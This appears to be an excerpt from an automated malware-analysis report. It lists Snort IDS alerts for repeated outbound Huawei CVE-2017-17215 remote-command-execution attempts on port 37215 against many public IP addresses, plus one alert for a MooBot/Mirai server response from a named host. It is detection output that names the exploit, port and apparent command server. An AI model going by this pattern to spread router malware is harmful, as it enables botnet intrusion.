                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49826 -> 41.65.251.158:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35550 -> 168.165.233.141:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35550 -> 168.165.233.141:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36512 -> 157.21.67.49:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36512 -> 157.21.67.49:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58950 -> 197.71.207.159:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58950 -> 197.71.207.159:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46562 -> 197.224.182.83:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46562 -> 197.224.182.83:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41354 -> 197.93.123.78:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41354 -> 197.93.123.78:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55906 -> 197.159.88.79:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55906 -> 197.159.88.79:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38764 -> 60.176.144.80:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38764 -> 60.176.144.80:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40802 -> 41.157.99.54:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40802 -> 41.157.99.54:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50028 -> 27.41.96.136:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50028 -> 27.41.96.136:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44174 -> 197.38.235.14:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44174 -> 197.38.235.14:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43440 -> 197.212.61.129:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43440 -> 197.212.61.129:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51548 -> 172.101.164.72:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51548 -> 172.101.164.72:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34472 -> 41.90.43.161:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34472 -> 41.90.43.161:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57796 -> 197.249.133.131:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57796 -> 197.249.133.131:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57480 -> 78.242.93.228:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57480 -> 78.242.93.228:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34808 -> 41.19.255.66:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34808 -> 41.19.255.66:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36788 -> 69.74.218.35:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36788 -> 69.74.218.35:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34718 -> 197.89.108.63:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34718 -> 197.89.108.63:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39796 -> 197.52.45.132:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39796 -> 197.52.45.132:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54738 -> 41.9.160.205:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54738 -> 41.9.160.205:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52740 -> 149.227.100.108:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52740 -> 149.227.100.108:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34142 -> 197.5.25.5:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34142 -> 197.5.25.5:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47332 -> 197.146.199.163:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47332 -> 197.146.199.163:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60150 -> 157.12.120.37:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60150 -> 157.12.120.37:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34110 -> 41.81.198.30:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34110 -> 41.81.198.30:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58602 -> 157.10.69.196:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58602 -> 157.10.69.196:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49446 -> 199.229.94.109:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49446 -> 199.229.94.109:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36772 -> 182.102.31.222:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36772 -> 182.102.31.222:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41330 -> 197.148.93.189:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41330 -> 197.148.93.189:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51376 -> 41.76.204.184:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51376 -> 41.76.204.184:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55928 -> 41.25.193.130:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55928 -> 41.25.193.130:37215
                      Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 15.235.203.214:2466 -> 192.168.2.23:32848
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47490 -> 157.211.128.165:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47490 -> 157.211.128.165:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60312 -> 41.73.125.205:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60312 -> 41.73.125.205:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45076 -> 41.126.20.80:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45076 -> 41.126.20.80:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53440 -> 157.5.83.65:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53440 -> 157.5.83.65:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55784 -> 197.64.180.236:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55784 -> 197.64.180.236:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36240 -> 157.231.240.156:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36240 -> 157.231.240.156:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33028 -> 197.218.184.30:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33028 -> 197.218.184.30:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53610 -> 41.178.183.186:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53610 -> 41.178.183.186:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49226 -> 41.124.14.171:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49226 -> 41.124.14.171:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34534 -> 157.86.250.128:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34534 -> 157.86.250.128:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50026 -> 197.213.172.133:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50026 -> 197.213.172.133:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59582 -> 41.138.150.155:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59582 -> 41.138.150.155:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47450 -> 143.28.80.1:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47450 -> 143.28.80.1:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57256 -> 157.43.107.32:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57256 -> 157.43.107.32:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52500 -> 197.58.83.134:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52500 -> 197.58.83.134:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43252 -> 72.152.128.124:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43252 -> 72.152.128.124:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52632 -> 197.12.37.150:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52632 -> 197.12.37.150:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47996 -> 157.75.190.222:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47996 -> 157.75.190.222:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41416 -> 197.194.145.174:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41416 -> 197.194.145.174:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48482 -> 197.160.117.109:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48482 -> 197.160.117.109:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52842 -> 41.132.51.195:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52842 -> 41.132.51.195:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39010 -> 157.24.24.246:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39010 -> 157.24.24.246:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44268 -> 197.187.1.61:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44268 -> 197.187.1.61:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37038 -> 107.136.23.140:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37038 -> 107.136.23.140:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39054 -> 41.184.89.253:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39054 -> 41.184.89.253:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33262 -> 41.232.172.92:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33262 -> 41.232.172.92:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46354 -> 84.167.140.65:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46354 -> 84.167.140.65:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58944 -> 41.20.92.100:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58944 -> 41.20.92.100:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37060 -> 157.30.105.107:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37060 -> 157.30.105.107:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35634 -> 197.19.12.241:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35634 -> 197.19.12.241:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41506 -> 157.139.2.14:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41506 -> 157.139.2.14:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32798 -> 157.71.150.37:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:32798 -> 157.71.150.37:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52752 -> 157.176.101.215:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52752 -> 157.176.101.215:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43154 -> 197.252.90.201:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43154 -> 197.252.90.201:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45012 -> 157.20.27.216:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45012 -> 157.20.27.216:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52552 -> 157.113.160.230:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52552 -> 157.113.160.230:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50560 -> 157.213.175.190:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50560 -> 157.213.175.190:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56186 -> 157.159.217.82:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56186 -> 157.159.217.82:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38946 -> 67.15.208.48:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38946 -> 67.15.208.48:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57488 -> 157.234.59.179:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57488 -> 157.234.59.179:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44702 -> 221.83.41.173:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44702 -> 221.83.41.173:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58398 -> 197.247.106.185:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58398 -> 197.247.106.185:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35840 -> 72.48.156.196:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35840 -> 72.48.156.196:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56512 -> 197.137.254.119:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56512 -> 197.137.254.119:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43828 -> 195.225.222.112:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43828 -> 195.225.222.112:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48142 -> 197.21.129.208:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48142 -> 197.21.129.208:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44104 -> 41.123.176.91:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44104 -> 41.123.176.91:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50406 -> 157.51.198.43:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50406 -> 157.51.198.43:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43118 -> 197.65.44.128:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43118 -> 197.65.44.128:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56586 -> 41.244.190.175:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56586 -> 41.244.190.175:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34126 -> 157.77.213.179:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34126 -> 157.77.213.179:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39662 -> 216.40.91.1:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39662 -> 216.40.91.1:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44106 -> 197.114.117.243:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44106 -> 197.114.117.243:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37622 -> 196.108.213.184:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37622 -> 196.108.213.184:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58932 -> 157.211.77.112:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58932 -> 157.211.77.112:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39616 -> 157.134.191.30:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39616 -> 157.134.191.30:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50036 -> 88.195.110.211:37215
